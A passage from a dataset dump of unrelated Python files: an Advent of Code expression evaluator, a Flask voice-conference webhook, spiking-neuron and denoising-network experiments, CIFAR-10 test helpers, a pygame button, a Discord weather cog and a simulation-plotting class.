re\nfrom time import time\nfrom typing import Dict, List, Set, Tuple, Union\n\nfrom humanize import intcomma\n\n# Fix path so we can do a relative import: https://stackoverflow.com/a/27876800\nif __name__ == '__main__':\n if __package__ is None:\n import sys\n from os import path\n sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\n # Relative imports here\n from util import *\n\nINPUT_FILE='18-input.txt'\n#INPUT_FILE='18a-example.txt'\n#INPUT_FILE='18b-example.txt'\n#INPUT_FILE='18c-example.txt'\n#INPUT_FILE='18d-example.txt'\n\nnum_match = re.compile(r'[\\d]+')\ninput = [[bla for bla in line.split(' ') if bla] for line in get_file_contents(INPUT_FILE)[0]]\n\nexpr_result = []\n\ndef eval_expr(b):\n op = None\n result = 0\n stack = []\n take = True\n for i, a in enumerate(b):\n if op == '+':\n result += a\n op = None\n continue\n elif op == '*':\n result *= a\n op = None\n continue\n elif take:\n result = a\n take = False\n\n if a == '+':\n op = a\n elif a == '*':\n stack.append(result)\n take = True\n\n if stack:\n stack.append(result)\n result = reduce(mul, stack)\n return result\n\nfor expr in input:\n stack = [[]]\n for el in expr:\n parens_begin = 0\n afaf = ''\n for i, char in enumerate(el):\n if char == '(':\n parens_begin += 1\n stack.append([])\n elif char == ')':\n if (num_match.match(afaf)):\n stack[-1].append(int(afaf))\n afaf = ''\n stack[-2].append(eval_expr(stack.pop()))\n else:\n afaf += char\n if (num_match.match(afaf)):\n stack[-1].append(int(afaf))\n else:\n stack[-1].append(afaf)\n\n 
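    # The single entry left on the stack is the fully flattened top-level expression;\n    # eval_expr applies '+' immediately and defers '*' via its own stack, which is\n    # what gives addition higher precedence than multiplication here.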
expr_result.append(eval_expr(stack.pop()))\n\nprint(sum(expr_result))\n","sub_path":"18/18b.py","file_name":"18b.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"603167990","text":"#!/usr/bin/env python3\nfrom flask import Flask, jsonify\n\napp = Flask(__name__)\n\n# Placeholder conference name (assumed; the constant was otherwise undefined).\nCONF_NAME = \"my-conference\"\n\n\n@app.route(\"/webhooks/answer\")\ndef answer_call():\n    ncco = [\n        {\n            \"action\": \"talk\",\n            \"text\": \"Please wait while we connect you to the conference\"\n        },\n        {\n            \"action\": \"conversation\",\n            \"name\": CONF_NAME\n        }]\n    return jsonify(ncco)\n\n\nif __name__ == '__main__':\n    app.run(port=3000)\n","sub_path":"voice/connect-callers-to-a-conference.py","file_name":"connect-callers-to-a-conference.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"476576309","text":"'''\n\n\nUsing LIF Neuron with Poisson input to classify\nsimple matrix of digits given in binary\n\nReference:\n=========\nhttps://github.com/PanYicheng/brian2-bpstdp/blob/master/poisson-test.py\n\n\n'''\n\nimport brian2 as b2\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\n\n# Global Parameters\nms = b2.ms\nmV = b2.mV\nHz = b2.Hz\n\n\ndef elapsed(sec):\n\n    '''\n\n    This function returns the elapsed time\n\n    '''\n\n    if sec < 60:\n        return str(round(sec)) + ' secs'\n\n    elif sec < 3600:\n        return str(round(sec / 60)) + ' mins'\n\n    else:\n        return str(round(sec / 3600)) + ' hrs'\n\n\n\n\ndef drawBinImage(img):\n\n    '''\n\n    This function prints the given\n    image matrix for better display of\n    the data\n\n    '''\n    for row in img.tolist():\n\n        #print(row)\n        for r in row:\n            if r == 1:\n                print('*' , end = ' ')\n            else:\n                print(' ' , end = '')\n\n        print()\n\n\n    print()\n\n\n\nif __name__ == '__main__':\n\n    start_time = time.time()\n\n\n    zero = np.matrix([\n        0, 1, 1, 1, 0,\n        1, 0, 0, 0, 1,\n        1, 0, 0, 0, 1,\n        1, 0, 0, 0, 1,\n        1, 0, 0, 0, 1,\n        0, 1, 1, 1, 0\n        ])\n\n    one = np.matrix([\n        1, 1, 1, 0, 0,\n        0, 0, 1, 0, 0,\n        0, 0, 0, 0, 0,\n        0, 0, 0, 0, 0,\n        0, 0, 1, 0, 0,\n        0, 0, 1, 1, 0\n        ])    \n\n\n    two = np.matrix([\n        0, 1, 1, 0, 0,\n        1, 0, 0, 1, 0,\n        0, 0, 0, 1, 0,\n        0, 1, 1, 0, 0,\n        1, 0, 0, 0, 0,\n        1, 1, 0, 1, 1,\n        ])    \n    \n\n\n    data = [zero , one , two]\n    data = [d.reshape((6 , 5)) for d in data]\n\n    [drawBinImage(d) for d in data]\n\n    spike_time_arr = []\n    spike_fire_idx = []\n    spike_volt = []\n    state_time_arr = []\n\n\n    \n\n    num_samples , neurons = data[0].T.shape\n\n    tau = neurons * ms\n\n    print('Num samples: ' , num_samples , ' neurons: ' , neurons)\n\n    for x in range(len(data)):\n\n\n        poi_rates = np.arange(neurons) * Hz\n\n        ta = b2.TimedArray(data[x].T , dt = 1 * ms)\n        \n\n        Poi_Inp = b2.PoissonGroup(30 ,\n                                  rates = 'ta(t , i) * Hz' ,\n                                  name = 'Poisson_Input')\n\n        eqs_lif = '''\n\n        dv/dt = (I - v)/tau : 1 (unless refractory)\n        I = ta(t , i) : 1\n\n        '''\n\n        hidden = b2.NeuronGroup(neurons ,\n                                eqs_lif ,\n                                threshold = 'v > 0',\n                                reset = 'v = 0',\n                                refractory = 1 * ms , \n                                method = 'exact' ,\n                                name = 'hidden_layer')\n\n\n        output = b2.NeuronGroup(len(data) ,\n                                eqs_lif ,\n                                threshold = 'v > 0',\n                                reset = 'v = 0' ,\n                                method = 'euler' ,\n                                refractory = 1 * ms , \n                                name = 'output_layer'\n                                )\n\n\n        Syn_inp_hid = b2.Synapses(Poi_Inp , hidden ,\n                                  model = 'w : 1' ,\n                                  on_pre = 'v_post += w' ,\n                                  name = 'Synapse_Input_hidden')\n\n        \n\n        Syn_inp_hid.connect()\n\n        Syn_inp_hid.w = np.random.randn(30 * neurons) * 22\n        \n\n        Syn_hid_out = b2.Synapses(hidden , output ,\n                                  model = 'w : 1' ,\n                                  on_pre = 
'v_post += w' ,\n name = 'Synapse_hidden_output')\n\n\n Syn_hid_out.connect()\n\n Syn_hid_out.w = np.random.randn(neurons * len(data))\n\n state_mon = b2.StateMonitor(output ,\n variables = True ,\n record = True ,\n name = 'State_mon')\n\n spike_mon = b2.SpikeMonitor(hidden , name = 'Spike_mon_hidden')\n pop_rate_mon = b2.PopulationRateMonitor(output)\n\n b2.run(num_samples * ms , report = 'text')\n\n\n print('No of Spikes : {}'.format(spike_mon.num_spikes))\n print('Spike array: {}'.format(spike_mon.count))\n print()\n\n print('Spike times: ' , spike_mon.t[ : ])\n print()\n\n plt.plot(spike_mon.t/ms , spike_mon.i , '.k' , ms = 3)\n plt.xlabel('Time(ms)')\n plt.ylabel('Neuron Index')\n plt.show()\n \n\n elapsed_time = elapsed(time.time() - start_time)\n print('Elapsed time: ' , elapsed_time)\n \n \n","sub_path":"lif_poisson_classify.py","file_name":"lif_poisson_classify.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"111810261","text":"# The aim is to use DNN or RNN to learn denoising\n# The difficulty might come across will be the input data into train file or test file\n\n#import IPython.display\n#from ipywidgets import interact, interactive, fixed\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import FuncFormatter\nimport copy\nfrom scipy.fftpack import fft\nfrom scipy import ifft\nfrom scipy.signal import butter, lfilter\nimport scipy.ndimage\n#import soundfile as sf\nfrom scipy import ceil, complex64, float64, hamming, zeros\nimport tensorflow as tf\n\n\n### Function part ###\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef compute_accuracy(v_xs, v_ys):\n global prediction\n y_pre = sess.run(prediction, feed_dict={xs: v_xs, keep_prob: 1})\n correct_prediction = tf.equal(tf.argmax(y_pre, 1), tf.argmax(v_ys, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n result = sess.run(accuracy, feed_dict={xs: v_xs, ys: v_ys, keep_prob: 1})\n return result\n\n\ndef compute_loss(v_xs, v_ys):\n y_pre = sess.run(prediction, feed_dict={xs: v_xs, keep_prob: 1})\n dif = y_pre - v_ys\n dif = tf.constant(dif, tf.int32)\n dif = tf.abs(dif)\n loss = tf.reduce_mean(tf.reduce_sum(dif, reduction_indices=[0, 1]))\n result = sess.run(loss, feed_dict={xs: v_xs, ys: v_ys, keep_prob: 1})\n return result\n\ndef loss(v_xs, v_ys):\n y_pre = sess.run(prediction, feed_dict={xs: v_xs, keep_prob: 1})\n dif = y_pre - v_ys\n cross_entropy = tf.reduce_mean(tf.reduce_sum((dif)))\n loss = cross_entropy.eval(session = sess)\n # y_pre = sess.run(prediction, feed_dict={xs: v_xs, keep_prob: 1})\n # dif = y_pre - v_ys\n # dif = tf.constant(dif, tf.int32)\n # dif = tf.abs(dif)\n # loss = tf.reduce_mean(tf.reduce_sum(dif, reduction_indices=[0, 1]))\n # result = sess.run(loss, feed_dict={xs: v_xs, ys: v_ys, keep_prob: 1})\n loss = np.abs(loss)\n return loss\n\n\n### Structure part ###\n\n# define placeholder for inputs to network\n\nxs = tf.placeholder(tf.float32, [None, 2470])# , name=\"x_input\") # 247*10\nys = tf.placeholder(tf.float32, [None, 2470])# , name=\"y_input\")\n\nprediction = tf.placeholder(tf.float32, [None, 2470])\nkeep_prob = tf.placeholder(tf.float32)\n\n## fc1 layer ##\nwith tf.name_scope('fully_connected_layer1'):\n W_fc1 = weight_variable([2470, 2470])\n b_fc1 = bias_variable([2470])\n 
h_fc1 = tf.nn.relu(tf.matmul(xs, W_fc1) + b_fc1)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n## fc2 layer ##\nW_fc2 = weight_variable([2470, 2470])\nb_fc2 = bias_variable([2470])\nh_fc2 = tf.nn.relu(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\nh_fc2_drop = tf.nn.dropout(h_fc2, keep_prob)\n\n## fc2 layer ##\nW_fc3 = weight_variable([2470, 2470])\nb_fc3 = bias_variable([2470])\nprediction = tf.nn.sigmoid(tf.matmul(h_fc2_drop, W_fc3) + b_fc3)\n\n# the loss\nwith tf.name_scope('cross_entropy'):\n dif = prediction - ys\n cross_entropy = tf.reduce_mean(tf.reduce_sum((dif)))\n #cross_entropy = tf.reduce_mean(tf.losses.mean_squared_error(ys, prediction))\n tf.summary.histogram('cross_entropy', cross_entropy)\n tf.summary.scalar('cross_entropy', cross_entropy)\n\n# -tf.reduce_sum(ys * tf.log(prediction),\n# reduction_indices=[1]))\nwith tf.name_scope('train'):\n train_step = tf.train.AdamOptimizer(1e-5).minimize(cross_entropy)\n\nsess = tf.Session()\n\nmerged = tf.summary.merge_all()\nwriter = tf.summary.FileWriter(\"logsss5000000/\", sess.graph)\n\nsess.run(tf.global_variables_initializer())\n\nclean_mask = np.loadtxt(\"clean_mask.txt\")\nspec_train = np.loadtxt(\"spec_train.txt\")\nclean_mask_test = np.loadtxt(\"clean_mask_test.txt\")\nspec_train_test = np.loadtxt(\"spec_train_test.txt\")\n\nfor i in range(50000):\n batch_xs = spec_train\n batch_ys = clean_mask\n\n sess.run(train_step, feed_dict={xs: batch_xs, ys: batch_ys, keep_prob: 0.5})\n # if i % 5 == 0:\n # a = tf.Print(prediction, [prediction])\n # print (sess.run(prediction))\n # result = a + 0\n if i % 10 == 0:\n # print(compute_accuracy(spec_train_test, clean_mask_test))\n #result = sess.run(merged, feed_dict={xs: batch_xs, ys: batch_ys})\n #writer.add_summary(result, i)\n # print(compute_accuracy(spec_train_test, clean_mask_test))\n # print(compute_loss(spec_train_test, clean_mask_test))\n\n print(compute_accuracy(spec_train, clean_mask))\n print(loss(spec_train, clean_mask))\n \n\n# pre = sess.run(prediction,feed_dict={xs: batch_xs, ys: batch_ys})\n\n# ### Check part\n# a = stft(data, win, step)\n# b = a.shape\n\n\n# sess.run(prediction)\n","sub_path":"Preprocessing part/11.24. Denoising 5th versionize.py","file_name":"11.24. 
Denoising 5th versionize.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"580334198","text":"import argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import Subset\nimport numpy as np\nimport tqdm\nimport matplotlib.pyplot as plt\nfrom matplotlib.offsetbox import OffsetImage, AnnotationBbox\nfrom networks import Encoder\nfrom train import get_loader\n\ndef test_conv(model, subsample=False):\n \"\"\"Measures testing accuracy of the baseline\n \"\"\"\n # load in data\n testloader = get_loader(10, train=False, subsample=subsample)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # evaluation\n correct = 0\n total = 0\n with torch.no_grad():\n for data in testloader:\n images, labels = data\n images, labels = images.to(device), labels.to(device)\n outputs = model(images)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n return correct/total\n\ndef plot_tsne(targets, ret):\n\n # Load data\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n dataset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform)\n\n # target indices\n target_ids = range(len(set(targets)))\n\n colors = ['r', 'g', 'b', 'c', 'm', 'y', 'k', 'violet', 'orange', 'purple']\n\n plt.figure(figsize=(12, 10))\n\n ax = plt.subplot(aspect='equal')\n for label in set(targets):\n idx = np.where(np.array(targets) == label)[0]\n plt.scatter(ret[idx, 0], ret[idx, 1], c=colors[label], label=label)\n\n for i in range(0, len(targets), 250):\n img = (dataset[i][0] * 0.3081 + 0.1307).numpy()[0]\n img = OffsetImage(img, cmap = 'gray',zoom=1)\n ax.add_artist(AnnotationBbox(img, ret[i]))\n\n plt.savefig('./results/tsne.png')\n plt.legend()\n plt.show()\n\ndef encode_data(train = False, subsample = False):\n \"\"\"Encodes the dataset with the pretrained unsupervsied encoders\n using either the training or testing data.\n \"\"\"\n # load model\n model = Encoder()\n model.load_state_dict(torch.load('./results/encoder.pth', map_location=torch.device('cuda')))\n\n # Load data\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n dataset = torchvision.datasets.CIFAR10(root='./data', train=train, download=True, transform=transform)\n\n if subsample: # randomly samples 1/10 of the train/test data for multiple runs\n bound = 50000 if train else 10000\n size = 5000 if train else 1000\n dataset = Subset(dataset, np.random.randint(0, bound, size))\n\n # encode data using encoder\n data = []\n targets = []\n for m in tqdm.tqdm(dataset):\n target = m[1]\n targets.append(target)\n x = m[0]\n x = x.view(1, *x.shape)\n feat = model(x)\n data.append(feat.data.numpy()[0])\n\n return np.array(data), np.array(targets)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"494177046","text":"import pygame\n\n\nclass Button:\n def __init__(self, width, height, center, text, background, font, id):\n self.surface = pygame.Surface((width, height))\n self.rect = self.surface.get_rect()\n self.surface.fill(background)\n self.rect.center = center\n 
self.textSurf = font.render(text, 1, [0, 0, 0])\n self.textRect = self.textSurf.get_rect(center=(width / 2, height / 2))\n self.surface.blit(self.textSurf, self.textRect)\n self.rect = pygame.Rect(center, (width, height))\n self.id = id\n self.font = font\n self.text = text\n self.width = width\n self.height = height\n self.center = center\n\n def draw(self, screen):\n screen.blit(self.surface, self.rect)\n pygame.draw.rect(screen, [0, 0, 0], self.rect, 1)\n\n def change_background(self, background):\n self.surface = pygame.Surface((self.width, self.height))\n self.rect = self.surface.get_rect()\n self.surface.fill(background)\n self.rect.center = self.center\n self.textSurf = self.font.render(self.text, 1, [0, 0, 0])\n self.textRect = self.textSurf.get_rect(center=(self.width / 2, self.height / 2))\n self.surface.blit(self.textSurf, self.textRect)\n self.rect = pygame.Rect(self.center, (self.width, self.height))\n","sub_path":"Button.py","file_name":"Button.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"428182922","text":"from discord.ext import commands\r\nfrom cogs.utils.dataIO import dataIO\r\nimport aiohttp\r\nimport os\r\nfrom .utils import checks\r\nimport discord\r\n\r\n\r\nclass Weather:\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.settings_file = 'data/weather/weather.json'\r\n\r\n @commands.command(pass_context=True, name='weather', aliases=['we'])\r\n async def _weather(self, context, *location: str):\r\n \"\"\"Get the weather!\"\"\"\r\n settings = dataIO.load_json(self.settings_file)\r\n api_key = settings['WEATHER_API_KEY']\r\n if len(location) == 0:\r\n message = 'No location provided.'\r\n elif api_key != '':\r\n try:\r\n payload = {'q': \" \".join(location), 'appid': api_key}\r\n url = 'http://api.openweathermap.org/data/2.5/weather?'\r\n headers = {'user-agent': 'Red-cog/1.0'}\r\n conn = aiohttp.TCPConnector()\r\n session = aiohttp.ClientSession(connector=conn)\r\n async with session.get(url, params=payload, headers=headers) as r:\r\n parse = await r.json()\r\n session.close()\r\n celcius = parse['main']['temp']-273\r\n fahrenheit = parse['main']['temp']*9/5-459\r\n temperature = '{0:.1f} Celsius\\n{1:.1f} Fahrenheit'.format(celcius, fahrenheit)\r\n humidity = str(parse['main']['humidity']) + '%'\r\n pressure = str(parse['main']['pressure']) + ' hPa'\r\n wind_kmh = str(round(parse['wind']['speed'] * 3.6)) + ' km/h'\r\n wind_mph = str(round(parse['wind']['speed'] * 2.23694)) + ' mph'\r\n clouds = parse['weather'][0]['description'].title()\r\n icon = parse['weather'][0]['icon']\r\n name = parse['name'] + ', ' + parse['sys']['country']\r\n city_id = parse['id']\r\n em = discord.Embed(title='Weather in {}'.format(name), color=discord.Color.blue(), description='\\a\\n', url='https://openweathermap.org/city/{}'.format(city_id))\r\n em.add_field(name='**Conditions**', value=clouds)\r\n em.add_field(name='**Temperature**', value=temperature)\r\n em.add_field(name='\\a', value='\\a')\r\n em.add_field(name='**Wind**', value='{}\\n{}'.format(wind_kmh, wind_mph))\r\n em.add_field(name='**Pressure**', value=pressure)\r\n em.add_field(name='**Humidity**', value=humidity)\r\n em.set_thumbnail(url='https://openweathermap.org/img/w/{}.png'.format(icon))\r\n em.set_footer(text='Weather data provided by OpenWeatherMap', icon_url='http://openweathermap.org/themes/openweathermap/assets/vendor/owm/img/icons/logo_16x16.png')\r\n await self.bot.say(embed=em)\r\n except KeyError:\r\n 
message = 'Location not found.'\r\n                await self.bot.say('```{}```'.format(message))\r\n        else:\r\n            message = 'No API key set. Get one at http://openweathermap.org/'\r\n            await self.bot.say('```{}```'.format(message))\r\n\r\n\r\ndef check_folder():\r\n    if not os.path.exists(\"data/weather\"):\r\n        print(\"Creating data/weather folder...\")\r\n        os.makedirs(\"data/weather\")\r\n\r\n\r\ndef check_file():\r\n    weather = {}\r\n    weather['WEATHER_API_KEY'] = ''\r\n    weather['TIME_API_KEY'] = ''\r\n\r\n    f = \"data/weather/weather.json\"\r\n    if not dataIO.is_valid_json(f):\r\n        print(\"Creating default weather.json...\")\r\n        dataIO.save_json(f, weather)\r\n\r\n\r\ndef setup(bot):\r\n    check_folder()\r\n    check_file()\r\n    bot.add_cog(Weather(bot))","sub_path":"weather/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"460050607","text":"'''\nCreated on Mar 21, 2012\n\n@author: mkraus\n'''\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm, colors, gridspec\nfrom matplotlib.ticker import MultipleLocator, FormatStrFormatter, ScalarFormatter\n\n\nclass PlotReplay(object):\n    '''\n    classdocs\n    '''\n\n    def __init__(self, grid, distribution, hamiltonian, potential,nTime=0, iStart=0, nPlot=1, vMax=0.0):\n        '''\n        Constructor\n        '''\n        \n        # number of contour levels\n        self.nconts = 20\n        \n        # colour map\n        self.cmap = cm.jet\n#        self.cmap = cm.hsv\n#        self.cmap = cm.brg\n#        self.cmap = cm.RdYlGn\n        \n        if nTime > 0 and nTime < grid.nt:\n            self.nTime = nTime\n        else:\n            self.nTime = grid.nt\n        \n        self.nTime -= iStart\n        self.iTime = iStart\n        self.iStart = iStart\n        self.nPlot = nPlot\n        self.vMax = vMax\n        \n        self.grid = grid\n        self.distribution = distribution\n        self.hamiltonian = hamiltonian\n        self.potential = potential\n        \n        self.partnum = np.zeros(grid.nt+1)\n        self.momentum = np.zeros(grid.nt+1)\n        self.energy = np.zeros(grid.nt+1)\n        self.enstrophy = np.zeros(grid.nt+1)\n        self.entropy = np.zeros(grid.nt+1)\n        self.energy_f = np.zeros(grid.nt+1)\n        self.energy_p = np.zeros(grid.nt+1)\n        self.ekin = np.zeros(grid.nt+1)\n        self.epot = np.zeros(grid.nt+1)\n        \n        self.x = np.zeros(grid.nx+1)\n        self.n = np.zeros(grid.nx+1)\n        self.phi = np.zeros(grid.nx+1)\n        \n        self.x[0:-1] = self.grid.x\n        self.x[ -1] = self.grid.xLength()\n        \n        \n        # set up figure/window size\n        self.figure = plt.figure(num=None, figsize=(16,9))\n        \n        # set up plot margins\n        plt.subplots_adjust(hspace=0.2, wspace=0.25)\n        plt.subplots_adjust(left=0.03, right=0.97, top=0.93, bottom=0.05)\n        \n        # set up plot title (format string must match the set_text() call in add_timepoint)\n        self.title = self.figure.text(0.5, 0.97, 't = %1.2f' % (self.grid.t[self.iTime]), horizontalalignment='center') \n        \n        # set up tick formatter\n        majorFormatter = ScalarFormatter(useOffset=False)\n        ## -> limit to 1.1f precision\n        majorFormatter.set_powerlimits((-1,+1))\n        majorFormatter.set_scientific(True)\n\n        # add data for zero timepoint\n        self.add_timepoint()\n        \n        # set up plots\n        self.axes = {}\n        self.conts = {}\n        self.cbars = {}\n        self.lines = {}\n        \n        self.update_boundaries()\n        \n        \n        # create subplots\n        gs = gridspec.GridSpec(4, 4)\n        \n        self.axes[\"f\"] = plt.subplot(gs[0:2,0:2])\n        self.axes[\"n\"] = plt.subplot(gs[0:2,2])\n        self.axes[\"h\"] = plt.subplot(gs[2:4,0:2])\n        self.axes[\"p\"] = plt.subplot(gs[2:4,2])\n#        self.axes[\"T\"] = plt.subplot(gs[0:2,3])\n#        self.axes[\"V\"] = plt.subplot(gs[2:4,3])\n        self.axes[\"N\"] = plt.subplot(gs[0,3])\n        self.axes[\"P\"] = plt.subplot(gs[1,3])\n        self.axes[\"E\"] = 
plt.subplot(gs[2,3])\n self.axes[\"L\"] = plt.subplot(gs[3,3])\n \n \n # distribution function (filled contour)\n self.axes[\"f\"] = plt.subplot(gs[0:2,0:2])\n self.axes [\"f\"].set_title('$f (x,v)$')\n self.conts[\"f\"] = self.axes[\"f\"].contourf(self.grid.x, self.grid.v, self.distribution.f.T, self.nconts, cmap=self.cmap, norm=self.fnorm)\n self.cbars[\"f\"] = plt.colorbar(self.conts[\"f\"], orientation='vertical')\n \n # Hamilton function (filled contour)\n self.axes[\"h\"] = plt.subplot(gs[2:4,0:2])\n self.axes[\"h\"].set_title('$H (x,v)$')\n self.conts[\"h\"] = self.axes[\"h\"].contourf(self.grid.x, self.grid.v, self.hamiltonian.h.T, self.nconts, norm=self.hnorm)\n self.cbars[\"h\"] = plt.colorbar(self.conts[\"h\"], orientation='vertical')\n\n # density profile\n self.lines[\"n\"], = self.axes[\"n\"].plot(self.x, self.n)\n# self.axes [\"n\"].axis([self.grid.xMin, self.grid.xMax, self.density_min, self.density_max])\n self.axes [\"n\"].set_title('$n (x)$')\n# self.axes [\"n\"].yaxis.set_major_formatter(majorFormatter)\n self.axes [\"n\"].set_xlim((0.0, self.grid.xLength())) \n\n # potential profile\n self.lines[\"p\"], = self.axes[\"p\"].plot(self.x, self.phi)\n# self.axes [\"p\"].axis([self.grid.xMin, self.grid.xMax, self.potential_min, self.potential_max])\n self.axes [\"p\"].set_title('$\\phi (x)$')\n self.axes [\"p\"].yaxis.set_major_formatter(majorFormatter)\n self.axes [\"p\"].set_xlim((0.0, self.grid.xLength())) \n \n \n tStart, tEnd, xStart, xEnd = self.get_timerange()\n\n# # kinetic energy (time trace)\n# self.lines[\"T\"], = self.axes[\"T\"].plot(self.grid.t[tStart:tEnd], self.ekin[tStart:tEnd])\n# self.axes [\"T\"].set_title('$E_{kin} (t)$')\n# self.axes [\"T\"].set_xlim((xStart,xEnd)) \n# # self.axes [\"T\"].yaxis.set_major_formatter(majorFormatter)\n# \n# # potential energy (time trace)\n# self.lines[\"V\"], = self.axes[\"V\"].plot(self.grid.t[tStart:tEnd], self.epot[tStart:tEnd])\n# self.axes [\"V\"].set_title('$E_{pot} (t)$')\n# self.axes [\"V\"].set_xlim((xStart,xEnd)) \n# # self.axes [\"V\"].yaxis.set_major_formatter(majorFormatter)\n \n \n self.lines[\"N\"], = self.axes[\"N\"].plot(self.grid.t[tStart:tEnd], self.partnum [tStart:tEnd])\n self.lines[\"P\"], = self.axes[\"P\"].plot(self.grid.t[tStart:tEnd], self.momentum [tStart:tEnd])\n self.lines[\"E\"], = self.axes[\"E\"].plot(self.grid.t[tStart:tEnd], self.energy [tStart:tEnd])\n self.lines[\"L\"], = self.axes[\"L\"].plot(self.grid.t[tStart:tEnd], self.enstrophy[tStart:tEnd])\n# self.lines[\"E_f\"], = self.axes[\"E\"].plot(self.grid.t[tStart:tEnd], self.energy_f [tStart:tEnd])\n# self.lines[\"E_p\"], = self.axes[\"E\"].plot(self.grid.t[tStart:tEnd], self.energy_p [tStart:tEnd])\n \n self.axes [\"N\"].set_title('$\\Delta N (t)$')\n if np.abs(self.hamiltonian.P0) < 1E-3: \n self.axes [\"P\"].set_title('$P (t)$')\n else:\n self.axes [\"P\"].set_title('$\\Delta P (t)$')\n self.axes [\"E\"].set_title('$\\Delta E (t)$')\n self.axes [\"L\"].set_title('$\\Delta L_{2} (t)$')\n\n self.axes [\"N\"].set_xlim((xStart,xEnd)) \n self.axes [\"P\"].set_xlim((xStart,xEnd)) \n self.axes [\"E\"].set_xlim((xStart,xEnd)) \n self.axes [\"L\"].set_xlim((xStart,xEnd)) \n \n self.axes [\"N\"].yaxis.set_major_formatter(majorFormatter)\n self.axes [\"P\"].yaxis.set_major_formatter(majorFormatter)\n self.axes [\"E\"].yaxis.set_major_formatter(majorFormatter)\n self.axes [\"L\"].yaxis.set_major_formatter(majorFormatter)\n \n \n # switch off some ticks\n plt.setp(self.axes[\"f\"].get_xticklabels(), visible=False)\n 
plt.setp(self.axes[\"n\"].get_xticklabels(), visible=False)\n# plt.setp(self.axes[\"T\"].get_xticklabels(), visible=False)\n plt.setp(self.axes[\"N\"].get_xticklabels(), visible=False)\n plt.setp(self.axes[\"P\"].get_xticklabels(), visible=False)\n plt.setp(self.axes[\"E\"].get_xticklabels(), visible=False)\n \n \n self.update()\n \n \n \n def save_plots(self):\n filename = str('F_%06d' % self.iTime) + '.png'\n extent = self.axes[\"f\"].get_window_extent().transformed(self.figure.dpi_scale_trans.inverted())\n self.figure.savefig(filename, dpi=70, bbox_inches=extent)\n\n filename = str('N_%06d' % self.iTime) + '.png'\n extent = self.axes[\"N\"].get_window_extent().transformed(self.figure.dpi_scale_trans.inverted())\n self.figure.savefig(filename, dpi=70, bbox_inches=extent)\n\n filename = str('P_%06d' % self.iTime) + '.png'\n extent = self.axes[\"P\"].get_window_extent().transformed(self.figure.dpi_scale_trans.inverted())\n self.figure.savefig(filename, dpi=70, bbox_inches=extent)\n\n filename = str('E_%06d' % self.iTime) + '.png'\n extent = self.axes[\"E\"].get_window_extent().transformed(self.figure.dpi_scale_trans.inverted())\n self.figure.savefig(filename, dpi=70, bbox_inches=extent)\n\n filename = str('L2_%06d' % self.iTime) + '.png'\n extent = self.axes[\"L\"].get_window_extent().transformed(self.figure.dpi_scale_trans.inverted())\n self.figure.savefig(filename, dpi=70, bbox_inches=extent)\n\n\n \n def update_boundaries(self):\n self.fmin = +1e40\n self.fmax = -1e40\n \n self.fmin = min(self.fmin, self.distribution.f.min() )\n self.fmax = max(self.fmax, self.distribution.f.max() )\n\n\n self.hmin = +1e40\n self.hmax = -1e40\n \n self.hmin = min(self.hmin, self.hamiltonian.h.min() )\n self.hmax = max(self.hmax, self.hamiltonian.h.max() )\n\n \n df = self.fmax - self.fmin\n \n self.fnorm = colors.Normalize(vmin=self.fmin + 0.05 * df, vmax=self.fmax + 0.05*df)\n self.hnorm = colors.Normalize(vmin=self.hmin, vmax=self.hmax)\n \n self.density_min =-1.0\n self.density_max = 1.5 * self.distribution.density.max()\n \n# self.potential_min = 1.5 * self.potential.phi.min()\n# self.potential_max = 1.5 * self.potential.phi.max()\n# \n# if self.potential_min == self.potential_max:\n# self.potential_min -= 1.0\n# self.potential_max += 1.0\n \n \n def update(self, final=False):\n \n if not (self.iTime == 1 or (self.iTime-1) % self.nPlot == 0 or self.iTime-1 == self.nTime):\n return\n \n# self.update_boundaries()\n\n for ckey, cont in self.conts.items():\n for coll in cont.collections:\n self.axes[ckey].collections.remove(coll)\n \n# self.fnorm = colors.Normalize(vmin=self.fmin, vmax=self.fmax)\n \n self.conts[\"f\"] = self.axes[\"f\"].contourf(self.grid.x, self.grid.v, self.distribution.f.T, self.nconts, cmap=self.cmap, norm=self.fnorm)\n self.conts[\"h\"] = self.axes[\"h\"].contourf(self.grid.x, self.grid.v, 